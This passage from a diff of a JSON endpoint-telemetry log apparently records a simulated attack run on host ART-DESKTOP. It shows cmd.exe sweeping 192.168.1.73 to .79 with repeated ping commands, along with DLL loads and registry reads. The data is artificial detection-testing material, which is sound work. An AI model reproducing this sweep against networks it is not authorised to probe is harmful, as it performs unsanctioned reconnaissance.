4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "process", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572331990000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.73", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7992, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572332140000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "event_type": "process", - "pid": 7992, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572336830000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.74", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1640, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572336970000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336830000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336830000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336980000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336980000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336980000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336980000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336980000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336980000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336980000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336980000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572336980000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "event_type": "process", - "pid": 1640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572341830000, - "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.75", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5696, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572341980000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572341990000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "event_type": "process", - "pid": 5696, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572346830000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.76", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3708, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572346940000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346830000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346830000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346980000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346980000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346980000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346980000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346980000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346980000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346980000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346980000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572346980000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572349340000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572349340000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572349340000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "process", - "pid": 3708, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572351840000, - "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.77", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7576, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572351990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572351980000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "event_type": "process", - "pid": 7576, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572356830000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.78", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4532, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572356970000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356830000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356830000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572356990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "event_type": "process", - "pid": 4532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572361990000, - "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.79", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5920, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572362130000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572361990000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572362140000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572362140000, - "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5920, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 